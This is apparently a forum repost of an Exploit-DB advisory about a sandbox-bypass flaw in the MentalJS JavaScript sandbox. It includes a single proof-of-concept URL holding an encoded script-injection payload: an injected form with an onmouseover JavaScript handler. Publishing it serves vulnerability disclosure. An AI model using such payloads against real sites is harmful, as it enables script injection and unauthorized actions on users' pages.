Exploit MentalJS - Sandbox Security Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38770
Проверка EDB
  1. Пройдено
Автор
RAFAY BALOCH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2013-09-20
MentalJS - Sandbox Security Bypass
Код:
source: https://www.securityfocus.com/bid/62581/info

MentalJS is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. 

http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
 
Источник
www.exploit-db.com

Похожие темы